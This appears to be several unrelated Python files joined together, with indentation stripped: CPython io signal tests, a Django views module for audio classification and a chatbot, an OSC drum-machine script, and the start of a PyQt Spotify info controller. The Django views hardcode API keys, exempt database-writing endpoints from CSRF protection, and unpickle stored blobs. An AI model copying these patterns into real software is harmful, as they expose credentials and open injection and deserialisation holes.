def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
def _set_non_blocking(self, fd):
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
self.assertNotEqual(flags, -1)
res = fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
self.assertEqual(res, 0)
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
self._set_non_blocking(r)
self._set_non_blocking(w)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertTrue(sent == received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
class CMiscIOTest(MiscIOTest):
io = io
class PyMiscIOTest(MiscIOTest):
io = pyio
# Jython does not use integer file descriptors but an object instead.
# Unfortunately, _pyio.open checks that it is an int.
# Override the affected test version just so we can skip it visibly.
@unittest.skipIf(support.is_jython, "Jython does not use integer file descriptors")
def test_attributes(self):
pass
@unittest.skipIf(support.is_jython, "Jython does not support os.pipe()")
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1 // 0
@unittest.skipUnless(threading, 'Threading required for this test.')
@unittest.skipIf(sys.platform in ('freebsd5', 'freebsd6', 'freebsd7'),
'issue #12429: skip test on FreeBSD <= 7')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
signal.alarm(1)
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
self.assertRaises(ZeroDivisionError,
wio.write, item * (1024 * 1024))
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1//0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupterd_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupterd_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = 1024 * 1024
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
def _read():
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
self.assertEqual(N, wio.write(item * N))
wio.flush()
write_finished = True
t.join()
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupterd_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupterd_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def test_main():
tests = (CIOTest, PyIOTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = dict((name, getattr(io, name)) for name in all_members)
py_io_ns = dict((name, getattr(pyio, name)) for name in all_members)
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
views.py
|
from django.http import Http404, JsonResponse
from django.shortcuts import render
from chatbot.chatbot import create_chatbot
import threading
import pickle
import collections
from io import BytesIO
import numpy as np
import urllib.request
import json
import wave
import librosa
import pandas as pd
from homepage.models import Memory, Person, Raw_Conversation
from django.views.decorators.csrf import csrf_exempt
from django.utils.decorators import method_decorator
from sklearn.naive_bayes import GaussianNB
from chatterbot.trainers import ListTrainer
url ="https://samples.openweathermap.org/data/2.5/weather?q=Eberstadt,%20DE&appid=b6907d289e10d714a6e88b30761fae22"
import sys
np.set_printoptions(threshold=sys.maxsize)
#====Create cheatbot
chatbot = create_chatbot()
#====
def get_mfcc_feature(data):
"""
Converts a wave file into his mfcc features
@args:
data(binary):
@return:
mfcc_features(np.array)
"""
fs=44100
x = librosa.util.fix_length(data, 45000)
mfcc_features = librosa.feature.mfcc(y=x, sr=fs)
return mfcc_features
def get_person(request,name_person):
count = Person.objects.filter(first_name=name_person).count()
if count==0:
p1 = Person(first_name=name_person)
p1.save()
return JsonResponse({"name_person": "unkown"})
else:
return JsonResponse({"name_person": "kown"})
@method_decorator(csrf_exempt, name='post')
def classify_audio(request):
'#0.Step: Get data for classification'
data = request.body
'#1.Step: Check if shape is dividy by 2 zero'
if len(data)%2==0:
data_float_raw = librosa.util.buf_to_float(data)
else:
data_float_raw = librosa.util.buf_to_float(data[:-1])
'2.Step: # Trim the beginning and ending silence'
data_float, index = librosa.effects.trim(data_float_raw)
'#0.1.Step: Get mfcc feature for data'
prediction_mfcc = get_mfcc_feature_data(data_float)
'#0.2.Step: Flatten mfcc '
prediction_mfcc_fl = prediction_mfcc.flatten()
'#1.Step: Load all data from dbase table Memory'
df = pd.DataFrame(list(Memory.objects.all().values()))
'#2.Step: Create train_label and train_data'
train_data_list = []
for i in range(0, len(df)):
train_data_list.append(
bytes_numpy(df.loc[i, "blob_data_mfcc"]).flatten()
)
train_data = np.array(train_data_list)
train_label = df["ground_truth"].values
'#3.Step: Fit bayes classifier'
clf = GaussianNB()
clf.fit(train_data, train_label)
'#4.Step: Make prediction'
prediction = clf.predict([prediction_mfcc_fl])
print(prediction)
'# Make relative prediction'
relative_predict = clf.predict_log_proba([prediction_mfcc_fl]) / clf.predict_log_proba([prediction_mfcc_fl]).sum()
relative_predict_round_flat = np.around(relative_predict * 100, 4).flatten()
'#Step: Combine the classes and the relative'
result_dict = {}
for el_cl, el_pre in zip(clf.classes_, relative_predict_round_flat):
result_dict[el_cl] = el_pre
'#Step:Sort the dict'
d_sorted = dict(sorted(result_dict.items(), key=lambda kv: kv[1]))
print(d_sorted)
return JsonResponse({"prediction": d_sorted})
def home(request ):
return render(request, 'home.html')
@method_decorator(csrf_exempt, name='post')
def recorded_audio(request):
data = request.body
ground_truth = request.headers["Ground-Truth"]
'#1.Step: Check if shape is dividy by 2 zero'
if len(data)%2==0:
data_float = librosa.util.buf_to_float(data)
else:
data_float = librosa.util.buf_to_float(data[:-1])
'#1.Step: Get the raw data'
np_bytes = BytesIO()
np.save(np_bytes, data_float, allow_pickle=True)
np_bytes_raw = np_bytes.getvalue()
'#2.Step: Get the mfcc features'
mfcc = get_mfcc_feature_data(data_float)
np_bytes = BytesIO()
np.save(np_bytes, mfcc, allow_pickle=True)
np_bytes_mfcc = np_bytes.getvalue()
m1 = Memory(ground_truth=ground_truth,blob_data_raw=data,
blob_data_float=np_bytes_raw, blob_data_mfcc=np_bytes_mfcc)
m1.save()
return JsonResponse({"successfully":"Successfully saved to db"})
def reco(request):
return render(request, 'reco.html')
def audio(request):
'#1.Step: Get all memoires for the table'
all_memories = Memory.objects.all()
all_memories_list = []
for el in all_memories.values('ground_truth').distinct():
key_word = el["ground_truth"]
Memory.objects.filter(ground_truth=key_word)
count = Memory.objects.filter(ground_truth=key_word).count()
all_memories_list.append({"ground_truth":key_word,
"count":count
})
return render(request,'record_audio.html',{"Person":"Gustav","all_memories_list":all_memories_list})
def get_weather(request):
url = 'http://api.openweathermap.org/data/2.5/weather?q=Eberstadt,ger&units=metric&lang=de&APPID=b3b25ed86b9fb6cfaac03f9b37164eef'
req = urllib.request.urlopen(url)
req_con = req.read().decode('utf-8')
req_json = json.loads(req_con)
return JsonResponse(req_json)
def chatbot_answer(request,name_person_global,person_statement):
'#1.Step: The the question'
print("ehllo")
chatbot_response = chatbot.get_response(person_statement)
'#2.Step: Save conversation for training'
task = threading.Thread(target=save_to_db, args=(name_person_global,person_statement,chatbot_response))
'#2.1.Step: Define task as deamon so that the main program can exit and the saving to db is in other thread'
task.daemon = True
task.start()
return JsonResponse({"chatbot_response":str(chatbot_response)})
def train_chatbot(request,optional_answer_chatbot,person_statement):
trainer = ListTrainer(chatbot)
trainer.train([person_statement,optional_answer_chatbot])
return JsonResponse({"successful_trained": f"person_statement: {person_statement},"+
f"optional_answer_chatbot:{optional_answer_chatbot}"})
# Get example audio file
def get_mfcc_feature_data(data):
"""
Converts a wave file into his mfcc features
@args:
data_path(str):
@return:
mfcc_features(np.array)
"""
fs = 44100
x = librosa.util.fix_length(data, 45000)
mfcc_features = librosa.feature.mfcc(y=x, sr=fs)
return mfcc_features
def save_to_db(name_person_global,person_statement,chatbot_response):
"""
functions save a dataset to the database
@args:
- name_person_global (str): e.g. "gustav"
- person_statement(str): e.g. "Wie heißt du?"
- chatbot_response (str): ich heiße Felix
"""
rc = Raw_Conversation(person_name=name_person_global,person_statement=person_statement,
chatbot_response=chatbot_response)
rc.save()
def bytes_numpy(bytes_raw):
load_bytes = BytesIO(bytes_raw)
loaded_np = np.load(load_bytes, allow_pickle=True)
return loaded_np
|
drumMachineWithSequences.py
|
#!/usr/bin/env python
# -o--
"""
drumMachineWithSequences.py
Demo how OSC can manage sound objects defined by RTcmix.
Event loop manages threads for sending MIDI sequences and other data
via OSC paths. One thread to track the others and post state to
stdout.
"""
version :str = "0.1" #RELEASE
USAGE :str = "USAGE: drumMachineWithSequences.py [--help] [--hostname HOSTNAME][--port PORT]"
#-------------------------------------- -o--
from threading import Thread
import time
#
import MOSLog
log = MOSLog.MOSLog(logTime=True, logDate=False)
#import MOSDump as dump
import MOSZ as z
import MOSMusic as music
import MOSOSC
import MOSRTcmix
#-------------------------------------- -o--
# Globals.
bpm :float = 25 #DEFAULT
#
lowThreadEnabled :bool = True
lowSequenceEnabled :bool = False
lowCount :float = -1.0 #NB Initial value out of range.
lowCountPrev :float = lowCount
lowSequenceSubdivision :float = 2.0
lowSequenceOrnamentsEnabled :bool = False
lowOrnament :str = ""
highThreadEnabled :bool = True
highSequenceEnabled :bool = False
highCount :float = -1.0 #NB Initial value out of range.
highCountPrev :float = highCount
highSequenceSubdivision :float = 7.0
boomString :str = ""
kapowString :str = ""
#
postThreadEnabled :bool = True
postEventsEnabled :bool = True
commonSequenceSubdivision :float = lowSequenceSubdivision * highSequenceSubdivision
#-------------------------------------- -o--
# Functions.
# -o-
def lowSequence(**kwargs:dict) -> None:
global lowCount
global lowOrnament
value :int = music.generateScaleSequence(**kwargs)
while True:
if not lowThreadEnabled: break
if not lowSequenceEnabled: continue
lowCount = next(value)
lowOrnament = ""
msg = MOSRTcmix.cmixMessage(client, "/lowSequence", [lowCount])
if lowSequenceOrnamentsEnabled:
ornamentBlob = music.generateOrnament(lowCount, kwargs["key"], kwargs["mode"], bpm)
if ornamentBlob:
ornamentName, ornamentBPM, ornamentSubdivision, ornament = tuple(ornamentBlob)
lowOrnament = ornamentName
msg = MOSRTcmix.cmixMessageAdd(client, msg, ornamentName, [ornamentBPM, ornamentSubdivision, ornament])
client.send(msg)
sleepSubdivisionPerBeat(lowSequenceSubdivision)
# -o-
def highSequence(**kwargs:dict) -> None:
global highCount
value :int = music.generateScaleSequence(**kwargs)
while True:
if not highThreadEnabled: break
if not highSequenceEnabled: continue
highCount = next(value)
client.messageSend("/highSequence", [highCount])
sleepSubdivisionPerBeat(highSequenceSubdivision)
# -o-
def makeBoom() -> None:
global boomString
boomString = "BOOM."
client.messageSend("/boom", [1])
sleepSubdivisionPerBeat(commonSequenceSubdivision)
boomString = ""
# -o-
def makeKapow() -> None:
global kapowString
kapowString = "KAPOW!"
client.messageSend("/kapow", [1])
sleepSubdivisionPerBeat(commonSequenceSubdivision)
kapowString = ""
# -o-
def postOneEvent() -> None:
lowCountString :str = " ."
highCountString :str = " ."
asterisk :str = " "
global lowCountPrev, highCountPrev
global lowOrnament
#
if lowCount != lowCountPrev:
lowCountString = lowCountPrev = lowCount
if len(lowOrnament) > 0:
asterisk = " *"
lowOrnament = " " + lowOrnament
if highCount != highCountPrev:
highCountString = highCountPrev = highCount
s :str = f"| {lowCountString:4}{asterisk} {boomString:5} {kapowString:6}{highCountString:5}{lowOrnament}"
log.message(s)
lowOrnament = ""
# -o-
def postEvents() -> None:
while True:
if not postThreadEnabled: break
if not postEventsEnabled: continue
postOneEvent()
sleepSubdivisionPerBeat(commonSequenceSubdivision)
# -o-
def sleepSubdivisionPerBeat(subDivision:int=1) -> None:
if (bpm <= 0) or (subDivision <= 0):
z.postAndExit(f"{log.defName}: bpm or subDivision are LESS THAN OR EQUAL TO ZERO.")
time.sleep(music.subdivisionPerBeat(bpm, subDivision))
#-------------------------------------- -o--
# Local sequence generators.
# -o-
def generateMonotonicSequence(initialValue:int=0) -> int:
startValue :int = initialValue
while True:
yield startValue
startValue += 1
#-------------------------------------- -o--
# Test things.
# -o-
def testOSC() -> None:
test1 :bool = False
test2 :bool = True
client = MOSOSC.MOSOSC()
client.createClient()
# Send frequencies.
#
if test1:
for r in range(200, 400, 25):
client.messageSend("/lowSequence", [r])
time.sleep(1)
# Send MIDI. Traverse all modes on ivory keys only.
#
if test2:
ivoryKeys :list = music.ModesAdditional[music.ModeNames.major].copy()
root :int = 60
for name in music.Modes.keys():
midiRoot = root + ivoryKeys.pop(0)
log.info(name)
scale :list = music.Modes[name].copy()
scale.append(scale[0] + music.NOTES_PER_OCTAVE)
for note in scale:
client.messageSend("/lowSequence", [midiRoot + note])
time.sleep(0.5)
time.sleep(1)
#
print()
z.postAndExit("")
#ENDDEF -- testOSC()
# -o-
def testCMIXOSCData() -> None:
client = MOSOSC.MOSOSC()
client.createClient(cmdlineArgs.hostname, cmdlineArgs.port)
MOSRTcmix.testSendingRawOSCMessagesToScoreEnabledWithMincOSCData(client)
MOSRTcmix.testSendingCMIXOSCMessagesToScoreEnabledWithMincOSCData(client)
print()
z.postAndExit("")
# -o-
def testScaleSequencer():
# kwargs for generateScaleSequence().
#
d :dict = {
#"key" : music.Key.C, #DEFAULT
#"key" : music.Key.D,
#"key" : music.Key.Gs,
#"octave" : music.MIDINote.C4, #DEFAULT
"octave" : music.MIDINote.C2,
#"scaleForMode" : music.ModeNames.ionian, #DEFAULT
"mode" : music.ModeNames.locrian,
#"octaveRange" : 2, #DEFAULT
"octaveRange" : 3,
#"direction" : music.Direction.UP, #DEFAULT
#"direction" : music.Direction.DOWN,
#"direction" : music.Direction.DOWNUP,
#"direction" : music.Direction.UPDOWN,
#"scaleEndBoundByRoot" : True, #DEFAULT
#"scaleEndBoundByRoot" : False,
}
index = music.generateScaleSequence(**d)
#
while True:
if z.readOneCharacter() == 'q': break
nextNote :int = next(index)
print(f" {nextNote}", end="", flush=True)
#
print("\n\nDONE.", end="\n\r", flush=True)
z.postAndExit("")
#ENDDEF -- testScaleSequencer()
# -o-
def testOrnaments():
rval :list = []
rval = music._translateOrnamentScaleToMIDI("sixteenthLeadIn", 60, music.Key.C, music.ModeNames.ionian)
log.info(f"01: {rval}")
rval = music._translateOrnamentScaleToMIDI("sixteenthLeadIn", 69, music.Key.C, music.ModeNames.ionian)
log.info(f"02: {rval}")
#music._translateOrnamentScaleToMIDI("sixteenthLeadIn", 63, music.Key.C, music.ModeNames.ionianX) #FAIL (system).
#music._translateOrnamentScaleToMIDI("sixteenthLeadIn", -1, music.Key.C, music.ModeNames.pentatonic) #FAIL
#music._translateOrnamentScaleToMIDI("sixteenthLeadIn", 110, music.Key.C, music.ModeNames.pentatonic) #FAIL
rval = music._translateOrnamentScaleToMIDI("sixteenthLeadIn", 66, music.Key.C, music.ModeNames.pentatonic)
log.info(f"03: {rval}")
rval = music._translateOrnamentScaleToMIDI("sixteenthTripletTurnaround", 52, music.Key.E, music.ModeNames.phrygian)
log.info(f"04: {rval}")
rval = music._translateOrnamentScaleToMIDI("sixteenthTripletTurnaround", 59, music.Key.E, music.ModeNames.phrygian)
log.info(f"05: {rval}")
rval = music._translateOrnamentScaleToMIDI("sixteenthTripletTurnaround", 67, music.Key.C, music.ModeNames.ionian)
log.info(f"06: {rval}")
rval = music._translateOrnamentScaleToMIDI("sixteenthPop", 60, music.Key.C, music.ModeNames.mixolydian)
log.info(f"07: {rval}")
rval = music._translateOrnamentScaleToMIDI("sixteenthPop", 64, music.Key.C, music.ModeNames.mixolydian)
log.info(f"08: {rval}")
print()
z.postAndExit("")
#-------------------------------------- -o--
# Main.
# -o-
def postHotkeys() -> None:
print( f"""
HOTKEYS--
h Enable/disable high sequence
l Enable/disable low sequence
L Enable/disable low sequence ornaments
b Trigger BOOM
k Trigger KAPOW
C Clear CMIX Disk Memory
- - - - - - - - - - - - - - -
M/m Raise/lower BPM ({bpm})
o Show/hide OSC output
t Hide/show timeline
H Post hotkeys (anytime)
q Quit
""" )
if "__main__" == __name__:
cmdlineArgs = z.parseCommandlineArguments( [
{ "option_strings" : "--hostname",
"default" : "127.0.0.1",
"help" : "Hostname or IP upon which to listen.",
},
{ "option_strings" : "--port",
"default" : 50001,
"type" : int,
"help" : "Port upon which to listen.",
},
] )
#-------------------------------------------- -o-
#testOSC() #DEBUG
#testCMIXOSCData() #DEBUG
#testScaleSequencer() #DEBUG
#testOrnaments() #DEBUG
#-------------------------------------------- -o-
lowSequenceArgs :dict = {
"key" : music.Key.C,
"mode" : music.ModeNames.mixolydian,
#"mode" : music.ModeNames.pentatonic,
"octave" : music.MIDINote.C2,
#"octaveRange" : 2,
#"direction" : music.Direction.UP,
"scaleEndBoundByRoot" : False,
}
highSequenceArgs :dict = {
"key" : music.Key.F,
"mode" : music.ModeNames.mixolydian,
"octave" : music.MIDINote.C5,
"octaveRange" : 3,
"direction" : music.Direction.DOWNUP,
#"scaleEndBoundByRoot" : False,
}
lowThread :Thread = Thread(target=lowSequence, kwargs=lowSequenceArgs)
highThread :Thread = Thread(target=highSequence, kwargs=highSequenceArgs)
postThread :Thread = Thread(target=postEvents)
#
client = MOSOSC.MOSOSC()
client.createClient(cmdlineArgs.hostname, cmdlineArgs.port)
client.enablePathLogging = False
postHotkeys()
z.postCRToContinue()
print("\n")
client.messageSend("/clearDiskMemory")
#
lowThread.start()
highThread.start()
postThread.start()
while True:
ch = z.readOneCharacter()
if 'q' == ch: # Quit
client.messageSend("/quit")
log.info("Quit. Waiting for threads...")
break
elif 'H' == ch: # Post hotkeys.
postHotkeys()
#
elif 'M' == ch: # BPM up/down
bpm += 1
log.info(f"BPM = {bpm}")
elif 'm' == ch:
bpm -= 1
if bpm <= 0:
bpm = 1
log.warning("bpm cannot DROP BELOW 1.")
log.info(f"BPM = {bpm}")
elif 'o' == ch: # OSC reporting on/off
client.enablePathLogging = not client.enablePathLogging
elif 't' == ch: # Timeline off/on
postEventsEnabled = not postEventsEnabled
#
elif 'l' == ch: # lowSequence on/off
lowSequenceEnabled = not lowSequenceEnabled
elif 'L' == ch: # lowSequence ornaments on/off
lowSequenceOrnamentsEnabled = not lowSequenceOrnamentsEnabled
if not lowSequenceOrnamentsEnabled:
music.generateOrnamentReset()
elif 'h' == ch: # highSequence on/off
highSequenceEnabled = not highSequenceEnabled
#
elif 'b' == ch: # BOOM
makeBoom()
elif 'k' == ch: # KAPOW
makeKapow()
#
elif 'C' == ch: # clearDiskMemory
client.messageSend("/clearDiskMemory")
music.generateOrnamentReset()
#
lowThreadEnabled = False
highThreadEnabled = False
postThreadEnabled = False
lowThread.join()
highThread.join()
postThread.join()
#ENDMAIN
|
controller.py
|
"""
Fall 2017 CSc 690
File: controller.py
Author: Steve Pedersen & Andrew Lesondak
System: OS X
Date: 12/13/2017
Usage: python3 spotify_infosuite.py
Dependencies: model, musikki, playback, reviews, view, requests, urllib, unidecode, pyqt5
Description: Controller class. Used to generate window frames and handle events, such as key presses, mouse clicks.
It also handles calculations needed to display elements to the window correctly.
"""
import model
import view
import playback
import musikki
import flickr
from flickr import flickr_thread
from reviews import reviews
import json
import sys
import threading
import requests
import urllib
import ssl
import os
import sys
import shutil
import unidecode
import string
from threading import Thread
from time import sleep
from urllib.request import urlopen
from bs4 import BeautifulSoup
from PyQt5.QtWidgets import QApplication, QWidget, QLabel, QPushButton, QAction, QLineEdit
from PyQt5.QtMultimedia import QSoundEffect
from PyQt5.QtCore import *
from PyQt5 import QtNetwork, QtCore
from PyQt5.QtGui import *
from PyQt5 import QtGui
class Controller(QWidget):
"""Handles all logic to build frames and dispatch content to window.
Args:
app (object) -- QApplication
use_default (bool) -- Use default window size or not
"""
def __init__(self, app, use_default=True):
super().__init__()
self.app = app
self.determine_window_size(use_default)
# Build the main view: Multi-Frame Window
self.multi_frame_window = view.MultiFrameWindow(
self.window_x,
self.window_y,
self.window_w,
self.window_h,
"Spotify Info Suite", # window title
"multi_frame_window" # object name
)
self.multi_frame_window.show()
self.init_playback_frame()
self.init_bio_frame()
self.init_news_frame()
self.init_review_frame()
self.init_images_frame()
self.init_lyrics_frame()
self.init_social_frame()
def determine_window_size(self, use_default_size):
"""Window scales to a 1080 screen resolution by default, but will revert to your
own screen resolution if the app window ends up being bigger than your screen
or if use_default_size is set to False
Args:
use_default_size (bool) -- Use default window size or not
"""
screen_resolution = self.app.desktop().screenGeometry()
self.screen_width = screen_resolution.width()
self.screen_height = screen_resolution.height()
# minimum window dimensions
min_w, min_h = 1440, 900
# default window dimensions
def_w, def_h = 1920, 1080
window_fits = False
while not window_fits:
if not use_default_size:
w = self.screen_width
h = self.screen_height
else:
w = def_w
h = def_h
space_w = w / 4
space_h = h / 4
self.window_w = w - space_w
self.window_h = h - space_h
self.window_x = space_w / 4
self.window_y = space_h / 2
if not use_default_size:
window_fits = True
elif self.window_w <= min_w and self.window_h <= min_h:
window_fits = True
else:
def_w = min_w
def_h = min_h
def init_bio_frame(self):
"""
Initialize Bio frame and make the initial async request to Musikki for the Bio.
"""
x = 0
y = self.window_h * 0.1
w = self.window_w / 3
h = self.window_h*3/4 - y
self.bio_frame = model.Frame(
self, self.multi_frame_window, x,y, w,h, "bio_frame"
)
self.bio_frame.set_display_title("Bio", 10, 5)
self.bio_expando_btn = self.bio_frame.create_expando_button()
self.bio_expando_btn.clicked.connect(self.expand_bio)
self.multi_frame_window.add_frame_bio(self.bio_frame)
self.bio_nam = QtNetwork.QNetworkAccessManager()
self.bio_nam.finished.connect(self.search_bio_handler)
self.musikki_artist = musikki.search(self.current_artist)
if not self.musikki_artist.is_found:
# try again with formatted string
formatted_artist = self.format_unicode_alpha(self.current_artist)
self.musikki_artist = musikki.search(formatted_artist)
if self.musikki_artist.is_found:
self.musikki_artist.get_full_bio(self.bio_nam)
else:
self.bio_frame.set_display_text('No results for current artist.', 10, 45)
def init_news_frame(self):
"""
Initialize News frame and make the initial async request to Musikki.
"""
x = 0
y = self.window_h*3 / 4
w = self.window_w / 3
h = self.window_h / 4
self.news_frame = model.Frame(
self, self.multi_frame_window, x,y, w,h, "news_frame"
)
self.news_frame.set_display_title("News", 10, 5)
self.multi_frame_window.add_frame(self.news_frame)
self.news_nam = QtNetwork.QNetworkAccessManager()
self.news_nam.finished.connect(self.news_handler)
if self.musikki_artist.is_found:
self.musikki_artist.get_news(self.news_nam)
def init_playback_frame(self):
"""
Initialize Playback Frame, make the connection to Spotify and create playback listener thread.
"""
self.spotify = self.open_spotify()
self.update_current_playing()
self.playback_title_x = 10
self.playback_title_y = 5
x = 0
y = 0
w = self.window_w / 3
h = self.window_h * 0.1
self.playback_frame = model.Frame(self, self.multi_frame_window, x,y, w,h, 'playback_frame')
self.playback_frame.set_display_title(
self.get_current_playing(), self.playback_title_x, self.playback_title_y
)
self.playback_frame.create_playback_buttons()
self.playback_frame.get_playback_prev_button().clicked.connect(self.prev)
self.playback_frame.get_playback_play_button().clicked.connect(self.play_pause)
self.playback_frame.get_playback_next_button().clicked.connect(self.next)
self.multi_frame_window.add_frame(self.playback_frame)
# spawn a playback listener to keep InfoSuite in sync with Spotify
self.listener = Listener(self.current_playing, self.spotify)
self.listener.song_change.connect(self.update_playback_display)
self.listener.run()
def init_lyrics_frame(self):
"""
Initialize Lyrics frame and make the initial async request to Genius.
"""
x = self.window_w / 3
y = 0
w = self.window_w / 3
h = self.window_h * 0.75
self.lyrics_frame = model.Frame(
self, self.multi_frame_window, x,y, w,h, "lyrics_frame"
)
self.lyrics_frame.set_display_title("Lyrics", 10, 5)
self.lyrics_expando_btn = self.lyrics_frame.create_expando_button()
